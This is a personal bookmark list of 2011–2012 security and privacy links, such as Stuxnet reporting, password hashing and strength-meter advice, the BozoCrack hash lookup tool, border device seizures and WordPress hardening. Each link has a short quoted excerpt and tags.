The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet. The goal of the worm was to break Iranian nuclear centrifuge equipment by issuing specific commands to the industrial control hardware responsible for their spin rate. By doing so, both governments hoped to set back the Iranian research program—and the US hoped to keep Israel from launching a pre-emptive military attack.
hacking  iran  security  usa  cyberattack 
june 2012 by Aetles
Errata Security: Bogus story: no Chinese backdoor in military chip
Today's big news is that researchers have found proof of Chinese manufacturers putting backdoors in American chips that the military uses. This is false. While they did find a backdoor in a popular FPGA chip, there is no evidence the Chinese put it there, or even that it was intentionally malicious.
security  chip  hacking  debugging  hardware 
may 2012 by Aetles
Security researcher: I found secret reprogramming backdoors in Chinese microprocessors - Boing Boing
This backdoor has a key, which we were able to extract. If you use this key you can disable the chip or reprogram it at will, even if locked by the user with their own key. This particular chip is prevalent in many systems from weapons, nuclear power plants to public transport. In other words, this backdoor access could be turned into an advanced Stuxnet weapon to attack potentially millions of systems. The scale and range of possible attacks has huge implications for National Security and public infrastructure.
china  security  chip  backdoor 
may 2012 by Aetles
Is Your Credit Card Stolen? Check for free!
If you fear your credit card info has been stolen, enter it here and you can find out for free. Avoiding fraud has never been easier!
phishing  security 
may 2012 by Aetles
Mathy Vanhoef: WhatsApp Considered Insecure
For my internship I created a methodology to test the security of mobile applications. After I finished it I decided to take a look at WhatsApp and test the methodology I created. Several new vulnerabilities were found, including a very severe one that even affected people not using WhatsApp. But before going into detail let's first investigate the security history of WhatsApp.
whatsapp  iphone  ios  security 
may 2012 by Aetles
Dropbox tech blog » Blog Archive » zxcvbn: realistic password strength estimation
Over the last few months, I’ve seen a password strength meter on almost every signup form I’ve encountered. Password strength meters are on fire.

Here’s a question: does a meter actually help people secure their accounts? It’s less important than other areas of web security, a short sample of which include:

Preventing online cracking with throttling or CAPTCHAs.
Preventing offline cracking by selecting a suitably slow hash function with user-unique salts.
Securing said password hashes.
With that disclaimer — yes. I’m convinced these meters have the potential to help. According to Mark Burnett’s 2006 book, Perfect Passwords: Selection, Protection, Authentication, which counted frequencies from a few million passwords over a variety of leaks, one in nine people had a password in this top 500 list. These passwords include some real stumpers: password1, compaq, 7777777, merlin, rosebud. Burnett ran a more recent study last year, looking at 6 million passwords, and found an insane 99.8% occur in the top 10,000 list, with 91% in the top 1,000. The methodology and bias is an important qualifier — for example, since these passwords mostly come from cracked hashes, the list is biased towards crackable passwords to begin with.

These are only the really easy-to-guess passwords. For the rest, I’d wager a large percentage are still predictable enough to be susceptible to a modest online attack. So I do think these meters could help, by encouraging stronger password decisions through direct feedback. But right now, with a few closed-source exceptions, I believe they mostly hurt. Here’s why.
development  javascript  password  security  dropbox 
april 2012 by Aetles
Coding Horror: Speed Hashing
I'm too busy to read all this.
If you are a user:

Make sure all your passwords are 12 characters or more, ideally a lot more. I recommend adopting pass phrases, which are not only a lot easier to remember than passwords (if not type) but also ridiculously secure against brute forcing purely due to their length.

If you are a developer:

Use bcrypt or PBKDF2 exclusively to hash anything you need to be secure. These new hashes were specifically designed to be difficult to implement on GPUs. Do not use any other form of hash. Almost every other popular hashing scheme is vulnerable to brute forcing by arrays of commodity GPUs, which only get faster and more parallel and easier to program for every year.
encryption  hash  hashing  passwords  security 
april 2012 by Aetles
DNS Changer
Is your DNS OK?
A half dozen national Internet security teams around the world have created special web sites that will display a warning message to potential victims of the DNS Changer infection. For example if you visit then you'll get a German language page saying either that you appear to be infected or that you appear not to be infected. Andrew Fried and I created for the same purpose, though of course our page is in American English. The full list of these "DNS Checking" web sites is published on the DCWG's web site along with a lot of information about the threat, the arrests, the takedown, the court orders, and clean-up information for victims. Now that we've got all these web sites that are able to tell someone if they are a victim and that tell victims what to do to clean up their computers and their home routers, the problem seems to be getting people to care.
dns  security 
march 2012 by Aetles
Red Sweater Blog – Fix The Sandbox
The Broken Sandbox

At its best sandboxing is a means for app developers to faithfully state their intentions in a manner that can be evaluated by users, and also be reliably enforced by the operating system. So if your new “Fun on Facebook” app declares its intention is to connect to the web, you might judiciously allow it. If it says it needs to write files to the root of the filesystem, you’d be wise to search for another app.

Sandboxing on the Mac works by providing developers with a standardized list of “entitlements” which are clear descriptions of things it would like to do on your Mac. Examples include: access the internet, read files from your Pictures folder, print things on your printer.

The number one broken thing about sandboxing as it stands today, is the list of entitlements is simply too limited. Many apps on the App Store, including my own, will need to have their functionality considerably diminished, or in some cases made outright useless, in order to accommodate the available list of entitlements that sandboxing offers.
sandboxing  security  macappstore 
february 2012 by Aetles
Twitter User Barred From US For "Destroy America" Tweet
It is widely known that law enforcement agencies are turning to social networks to monitor citizens but one UK Twitter user saw a joke tweet land him in hot water, as he was detained by Homeland Security in Los Angeles, interrogated and barred from the US, The Sun reveals.

Before Leigh Van Bryan and his friend Emily Bunting embarked on a holiday to Los Angeles, Van Bryan tweeted that he was going to “destroy America,” boasting that he would try “digging up Marilyn Monroe” during his trip across the pond.

If someone tweets they would “destroy America,” you would expect it to alert law-enforcement agencies. However, in the UK, “destroying” can also be used as a term for partying or having a good time.

When Van Bryan and Bunting arrived in the US, they were immediately detained by officials at Los Angeles International Airport, held by armed guards and questioned for over five hours before they were “handcuffed, put in a van with illegal immigrants and locked up overnight.”

Twelve hours later, after being held in separate cells (Van Bryan shared his cell with Mexican drug dealers), the pair were released and put on a plane home.
usa  travel  government  security  twitter 
january 2012 by Aetles
US customs can and will seize laptops and cellphones, demand passwords | Naked Security
The American Civil Liberties Union has brought a suit against the US government over its seizure of the laptop of a computer security consultant - a seizure carried out at a Chicago airport about a year ago without a search warrant or any charges of crimes.

According to a report in Sunday's Boston Globe, the consultant - a former MIT researcher, David House - was returning from rest and relaxation in Mexico when federal agents seized his laptop.

According to the Globe, the government wanted to know more about House's connections to Bradley Manning, the US Army private accused of leaking classified information to WikiLeaks.

The seizure comes as no surprise. As Globe writer Katie Johnston notes, United States ports of entry are dubbed "Constitution-free zones" by civil liberties advocates.

Barring invasive techniques such as strip seizures, government agents are free to disregard Fourth Amendment protection against unreasonable search and seizure. They don't need reasonable suspicion or probable cause, and they can take what they like, be it laptops or smart phones.
usa  security  travel  privacy 
january 2012 by Aetles
Andy Baio: Think You Can Hide, Anonymous Blogger? Two Words: Google Analytics | Epicenter |
Last month, an anonymous blogger popped up on WordPress and Twitter, aiming a giant flamethrower at Mac-friendly writers like John Gruber, Marco Arment and MG Siegler. As he unleashed wave after wave of spittle-flecked rage at “Apple puppets” and “Cupertino douchebags,” I was reminded again of John Gabriel’s theory about the effects of online anonymity.

Out of curiosity, I tried to see who the mystery blogger was.

He was using all the ordinary precautions for hiding his identity — hiding personal info in the domain record, using a different IP address from his other sites, and scrubbing any shared resources from his WordPress install.

Nonetheless, I found his other blog in under a minute — a thoughtful site about technology and local politics, detailing his full name, employer, photo, and family information. He worked for the local government, and if exposed, his anonymous blog could have cost him his job.

I didn’t identify him publicly, but let him quietly know that he wasn’t as anonymous as he thought he was. He stopped blogging that evening, and deleted the blog a week later.

So, how did I do it? The unlucky blogger slipped up and was ratted out by an unlikely source: Google Analytics.
analytics  google  privacy  security 
november 2011 by Aetles
Securing Your WordPress Website - Smashing WordPress
Security has become a foremost concern on the Web in the past few years. Hackers have always been around, but with the increase in computer literacy and the ease of access to virtually any data, the problem has increased exponentially. It is now rare for a new website to not get comment spam within days of its release, even if it is not promoted at all.

This increase in naughty behavior, however, has spurred developers to write better code, and framework vendors have implemented many functions to help coders in their battle against the dark side.

Because data validation and sanitization is a big part of both security safeguards and normal user-input processing, by securing our code we will be not only protecting our behinds, but offering a better, more solid user experience.

While a large part of this article is specific to WordPress, a sizeable chunk is about general practices that anyone can use. Even the WordPress-centric sections contain useful logic, so reading them may well be worth it even if you use a different framework.
security  tips  wordpress 
november 2011 by Aetles
juuso/BozoCrack - GitHub
BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should.
hack  md5  passwords  security 
november 2011 by Aetles
Securing PHP | James Cunningham

While the provided PHP configuration (found in /etc/php.ini) is okay, it’s not great, and can be improved by changing some of the settings specified below.
php  security 
october 2011 by Aetles
Disabling Third-Party Cookies Doesn’t (Meaningfully) Improve Privacy « Kevin Montrose
I noticed in some discussion on Hacker News about Google Chrome an argument that disabling third-party cookies somehow improved privacy.  I don’t intend to comment on the rest of the debate, but this particular assertion is troubling.

At time of writing, only two browsers interfere with third-party cookies in any meaningful way.  Internet Explorer denies setting third-party cookies unless a P3P header is sent.  This is basically an evil bit, and just as pointless.  No other browser even pretends to care about this standard.

The other is Apple’s Safari browser, which denies setting third-party cookies unless a user has “interacted” with the framed content.  The definition of “interacted” is a bit fuzzy, but clicking seems to do it.  No other browser does this, or anything like it.  There are some laughably simple hacks around this, like floating an iframe under the user’s cursor (and, for some reason, submitting a form with a POST method).  Even if those hacks didn’t exist, the idea is still pointless.
security  privacy  cookies  tracking 
september 2011 by Aetles
Some real Shock and Awe: Racially profiled and cuffed in Detroit | Stories from the Heartland
Silly me. I thought flying on 9/11 would be easy. I figured most people would choose not to fly that day so lines would be short, planes would be lightly filled and though security might be ratcheted up, we’d all feel safer knowing we had come a long way since that dreadful Tuesday morning 10 years ago.

But then armed officers stormed my plane, threw me in handcuffs and locked me up.
9/11  security  america 
september 2011 by Aetles
Drupal upgrade easier | fuerstnet
The standard procedure to upgrade Drupal to the latest release is to download it from and follow the included UPGRADE.txt.
For administrators using the UNIX shell it may be easier using the attached patch files below instead of downloading and installing the newest complete Drupal release.
drupal  patch  security  ssh 
may 2011 by Aetles